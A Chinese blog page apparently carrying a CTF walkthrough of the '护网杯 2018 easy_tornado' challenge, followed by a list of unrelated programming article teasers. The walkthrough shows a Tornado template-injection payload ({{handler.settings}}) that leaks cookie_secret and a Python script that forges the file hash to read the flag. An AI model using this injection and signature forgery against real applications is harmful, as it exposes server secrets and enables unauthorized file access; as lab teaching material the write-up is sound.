当前位置：首页 > news >正文

[护网杯 2018]easy_tornado 1（两种解法！）

news 2026/4/12 4:15:47

题目环境：

发现有三个txt文本文件

/flag.txt
/welcome.txt
/hints.txt

依此点开

flag在/fllllllllllllag文件中

在hints.txt文件中发现md5计算
md5(cookie_secret+md5(filename))

并且三个文件中都存在filehash（文件名被哈希算法加密32位小写）

猜测解题关键点在md5(cookie_secret+md5(filename))这里
首先flag在/fllllllllllllag文件中**，所以就是filename=/fllllllllllllag;**filehash=md5(cookie_secret+md5(filename))
现在只缺cookie_secret这个东西，只要有了cookie_secret再通过这个md5(cookie_secret+md5(filename))公式进行计算即可获取到flag

注意题目easy_tornado 1；tornado是python的一个模板，可以看出这道题是模板注入类的题目

改哈希值看看是否有变化

回车

模板注入必须通过传输型如{{xxx}}的执行命令

果然是tornado模板注入

在tornado模板中，存在一些可以访问的快速对象,这里用到的是handler.settings，handler 指向RequestHandler，而RequestHandler.settings又指向self.application.settings，所以handler.settings就指向RequestHandler.application.settings了，这里面就是我们的一些环境变量。

简单理解handler.settings即可，可以把它理解为tornado模板中内置的环境配置信息名称，通过handler.settings可以访问到环境配置的一些信息，看到tornado模板基本上可以通过handler.settings一把梭。

爆cookie_secret
error?msg={{handler.settings}}

得到cookie_secret
76fc62a3-fea5-46ab-8f95-4b7262246f8c
按照公式进行加密

/fllllllllllllag=3bf9f6cf685a6dd8defadabfb41a03a1
cookie_secret+md5(filename)
76fc62a3-fea5-46ab-8f95-4b7262246f8c3bf9f6cf685a6dd8defadabfb41a03a1

md5(cookie_secret+md5(filename))
39482391ef4cc45a75262be45e94c725
最终payload：
?filename=/fllllllllllllag&filehash=39482391ef4cc45a75262be45e94c725

当然也可以用python脚本进行加密

import hashlib  #选用哈希模块
filename = '/fllllllllllllag'  #文件名
cookie_secret = '76fc62a3-fea5-46ab-8f95-4b7262246f8c'#cookie_secret值
filename = hashlib.md5(filename.encode()).hexdigest()#/fllllllllllllag进行32位小写哈希md5加密
a = cookie_secret + filename#md5值进行拼接
filehash = hashlib.md5(a.encode()).hexdigest()#计算拼接后的md5值的md532小写的值
print(filehash)#输出加密后的md532位小写的值

得到flag：
flag{5ae1c44d-f83a-4005-a69b-a1ea133391db}

[护网杯 2018]easy_tornado 1（两种解法！）

题目环境：发现有三个txt文本文件 /flag.txt/welcome.txt/hints.txt 依此点开 flag在/fllllllllllllag文件中在hints.txt文件中发现md5计算 md5(cookie_secretmd5(filename)) 并且三个文件中都存在filehash（文件名被哈希算法加密32位小写） 猜…...

编程日记 2023/11/12 16:27:27

冒泡排序（Bubble Sort）

目录 1.冒泡排序1.1 基本原理1.2 例子1.3 示例代码 2.魔炮排序2.1 基本原理2.1 例子2.2 示例代码 1.冒泡排序 1.1 基本原理冒泡排序（Bubble Sort）是一种简单的排序算法。它重复地遍历待排序的数列，一次比较两个元素，如果他们的…...

编程日记 2023/11/12 16:26:26

JVM源码剖析之软、弱、虚引用的处理细节

目录写在前面： 源码剖析： Java层面： JVM层面： 使用危险点： 总结： 版本信息： jdk版本：jdk8u40 垃圾回收器：Serial new/old 写在前面： 不同的垃圾回收…...

编程日记 2023/11/12 16:24:23

Linux服务器上搭建JupyterNotebook教程

搭建需知 1.确保是Linux服务器； 2.已经在linux服务器上安装好anaconda3； 搭建教程请按照顺序依次执行下面的命令： 1、安装Jupyter Notebook 执行以下命令，安装jupyter notebook conda install jupyter【注】如果anaconda3…...

编程日记 2023/11/12 16:23:22

记录bug1

项目场景： 提示：这里简述项目相关背景： 例如：项目场景：示例:通过蓝牙芯片(HC-05)与手机 APP 通信，每隔 5s 传输一批传感器数据(不是很大) 问题描述提示：这里描述项目中遇到的问题&#xff1…...

编程日记 2023/11/12 16:22:21

【MySQL】rank()、row_number()、dense_rank()用法详解

建表测试测试表数据：test1 CREATE DATABASE /*!32312 IF NOT EXISTS*/db_test /*!40100 DEFAULT CHARACTER SET utf8 */; USE db_test; /*Table structure for table test1 */ DROP TABLE IF EXISTS test1; CREATE TABLE test1 ( id int(10) NOT NULL, score i…...

编程日记 2023/11/12 16:21:20

NFT合约部署

部署合约： 1.web3 NFT合约部署工具 https://remix.ethereum.org/ 2.tron NFT合约部署工具 https://www.tronide.io/ 3.部署 web3 ERC721代码： // SPDX-License-Identifier: MIT pragma solidity ^0.8.2;import "openzeppelin/contracts/token/ERC7…...

编程日记 2023/11/12 16:20:19

【C++】从入门到精通第三弹——友元函数与静态类成员

这里写目录标题静态类成员友元友元方法静态类成员类成员一般都需要通过对象来访问，不可以通过类名直接访问，但是当我们将类成员定义为静态类成员，则允许使用类名直接访问。静态类成员是在类成员前定义static关键字。 1 #include<iost…...

编程日记 2023/11/12 16:19:17

acwing算法基础之搜索与图论--floyd算法

目录 1 基础知识2 模板3 工程化 1 基础知识 floyd算法的时间复杂度为O(n^3)，它用来解决多源最短路问题。它的原理是基于动态规划。 floyd算法的关键步骤： k从1到n。i从1到n。j从1到n，d[i][j] min(d[i][j], d[i][k] d[k][j])。经过上述三…...

编程日记 2023/11/12 16:18:16

Zabbix监控SSL证书有效期

一、介绍由于业务需要，最近通过 Let’s Encrypt 申请了一些 SSL 证书，而证书有效期为 3 个月，需要在证书到期之前 renew。由于域名较多经常忘记 renew，导致证书过期，因此想通过 Zabbix 的方式监控证书的到期时间&…...

编程日记 2023/11/12 16:17:16

Arduino OneButton按键处理库实现单击/双击/长按功能

Arduino OneButton按键处理库实现单击/双击长按功能 ✨在Arduino开发平台下，按键的单击/双击/长按功能，在通过使用OneButton库，很容易就可以轻松实现。这就是支持C/C模块化设计的好处，避免重复性开发的工作。 🔖本文将…...

编程日记 2023/11/12 16:16:15

day52 django的下载与安装

课程的大致安排大概两周的时间都是围绕着Django框架的学习，包括后续要学习的drf、Redis、celery、es等技术栈都是围绕Django展开的，因此、要求所有的同学必须认证学习了市场中所有使用Python开发的web项目，Django框架占有率达到90%以上 …...

编程日记 2023/11/12 16:15:14

WebGL智慧城市软件项目

WebGL开发智慧城市项目时，需要考虑多个方面，包括技术、隐私、安全和可持续性。以下是一些需要注意的关键问题，希望对大家有所帮助。北京木奇移动技术有限公司，专业的软件外包开发公司，欢迎交流合作。 1.隐私和数据安全…...

编程日记 2023/11/12 16:14:11

VMware重装后没有虚拟网卡

我重装VMware之后网络适配器里面没有虚拟网卡，找了CSDN上很多博主说的，都没用。最终去看了b站的up视频就成功了。原因是因为第一次安装后卸载不干净，软件在电脑上的注册表没有删掉。要用下面两个软件清理一下残留文件，这两个…...

编程日记 2023/11/12 16:12:09

软件安全基础

传参基础 64位汇编传参，当参数少于7个时， 参数从左到右放入寄存器: rdi, rsi, rdx, rcx, r8, r9。当参数为7个以上时， 前 6 个与前面一样， 但后面的依次从 “右向左” 放入栈中，即和32位汇编一样。我们这边要利用wr…...

编程日记 2023/11/12 16:10:06

探索项目管理软件的多重用途和益处

项目管理软件俨然成了当下项目管理话题中的热门词条，作为一个辅助性管理工具，项目管理软件有什么用？真的值得购入吗？ 什么是项目管理软件顾名思义，项目管理软件就是指在项目管理过程使用的各种软件工具。项目管理软件…...

编程日记 2023/11/12 16:08:04

Arduino ESP8266使用AliyunIoTSDK.h连接阿里云物联网平台

文章目录 1、AliyunIoTSDK简介2、相关库安装3、阿里云创建产品，订阅发布4、对开源的Arduino ESP8266源代码修改5、使用阿里云点亮一个LED灯6、设备向阿里云上传温度数据7、项目源码 1、AliyunIoTSDK简介 AliyunIoTSDK是arduino的一个库，可以在arduino的…...

编程日记 2023/11/12 16:07:03

【车载开发系列】AutoSar中的CANTP

【车载开发系列】AutoSar中的CANTP 【车载开发系列】AutoSar中的CANTP 【车载开发系列】AutoSar中的CANTP一. CANTP相关术语二. CANTP相关概念1）单帧：SF(Single Frame)2）首帧：FF(First Frame)3）连续帧CF(Consecutive F…...

编程日记 2023/11/12 16:06:02

JUL日志

文章目录 JUL日志JUL日志讲解Properties配置文件编写日志配置文件Lombok快速开启日志Mybatis日志系统 JUL日志如果使用System.out.println来打印信息，项目中存在大量的控制台输出语句，会显得很凌乱，而且日志的粒度是不够细的，假…...

编程日记 2023/11/12 16:05:01

ZZ308 物联网应用与服务赛题第G套

2023年全国职业院校技能大赛中职组物联网应用与服务任务书 （G卷） 赛位号：______________ 竞赛须知一、注意事项 1.检查硬件设备、电脑设备是否正常。检查竞赛所需的各项设备、软件和竞赛材料等； 2.竞赛任务中所使用…...

编程日记 2023/11/12 16:03:59

终极英雄联盟工具箱：如何用智能助手轻松提升游戏段位

终极英雄联盟工具箱：如何用智能助手轻松提升游戏段位【免费下载链接】League-Toolkit An all-in-one toolkit for LeagueClient. Gathering power 🚀. 项目地址: https://gitcode.com/gh_mirrors/le/League-Toolkit League Akari 是一款专为英雄…...

编程新知 2026/4/12 2:57:48

Linux I/O 演进史：从管道到零拷贝，一篇串起个服务端核心原语撑

前言在使用 kubectl get $KIND -o yaml 查看 k8s 资源时，输出结果中包含大量由集群自动生成的元数据（如 managedFields、resourceVersion、uid 等）。这些信息在实际复用 yaml 清单时需要手动清理，增加了额外的工作量。使用 kube…...

编程新知 2026/4/12 2:10:58

OpenGL多线程踩坑实录：EGL_BAD_ACCESS错误排查与修复指南

OpenGL多线程开发中的EGL_BAD_ACCESS：从原理到实战解决方案当你在深夜调试一个复杂的OpenGL多线程应用时，突然在终端看到EGL_BAD_ACCESS错误提示，那种感觉就像在高速公路上爆胎——既焦虑又无助。这个错误在多线程OpenGL开发中极为常见&…...

编程新知 2026/4/12 1:42:31

AD9833 DDS信号发生器驱动设计与嵌入式实践

1. AD9833信号发生器模块底层驱动技术解析AD9833是一款由Analog Devices（ADI）推出的低功耗、可编程波形发生器芯片，采用28引脚SSOP封装，通过标准SPI接口与主控MCU通信。其核心功能是生成高精度、频率可调的正弦波、三角波和方波信…...

编程新知 2026/4/12 1:14:13

Three.js 3D热力图实现全解析（从原理到实战）

1. 3D热力图的核心原理与实现思路第一次接触3D热力图时，我也被那些酷炫的立体数据可视化效果惊艳到了。这种技术本质上是通过颜色和高度两个维度来呈现数据密度分布，比传统的2D热力图多了Z轴信息。在Three.js中实现这个效果，关键要理解三个核…...

编程新知 2026/4/12 0:50:05

ComponentSnapshot + ImagePacker 实现业务海报生成

在技术领域，我们常常被那些闪耀的、可见的成果所吸引。今天，这个焦点无疑是大语言模型技术。它们的流畅对话、惊人的创造力，让我们得以一窥未来的轮廓。然而，作为在企业一线构建、部署和维护复杂系统的实践者，我们深知…...

编程新知 2026/4/11 23:53:24

技术拆解：豆包接入抖音电商的AI购物链路，从对话到下单如何实现15秒闭环

技术拆解：豆包接入抖音电商的AI购物链路，从对话到下单如何实现15秒闭环前言字节豆包App内测接入抖音电商，实现对话内下单闭环。本文从技术架构角度拆解AI购物链路的实现方式，以及对电商开发者的影响。一、AI购物链路架构用户自然语…...

编程新知 2026/4/11 22:25:02

Docker数据持久化：Volume完全指南，从入门到生产环境选型

你有没有遇到过这种情况：数据库跑在容器里，存了一堆数据，结果容器一删，数据全没了。这是因为容器的文件系统是临时的。容器没了，里面的数据也就没了。Docker Volume（数据卷）就是来解决这个问题的…...

编程新知 2026/4/11 20:26:23

FLUX.1-dev-fp8-dit文生图应用：Web前端集成方案

FLUX.1-dev-fp8-dit文生图应用：Web前端集成方案想象一下，你的产品经理走过来，兴奋地说：“我们的用户调研显示，用户希望在App里直接输入一句话，就能生成一张精美的配图，用来发动态或者做海报。…...

编程新知 2026/4/11 19:27:38

从单体LLM API到生产级AI网格：一位CTO带队完成迁移的6周攻坚日志，含全部YAML配置模板

第一章：AI原生软件研发服务网格实践指南 2026奇点智能技术大会(https://ml-summit.org) AI原生软件不再仅是“运行AI模型的应用”，而是将模型推理、数据闭环、特征演化、可观测性与策略编排深度内嵌于服务生命周期中的系统级范式。服务网格作为云原生基…...

编程新知 2026/4/11 19:04:52

相关文章：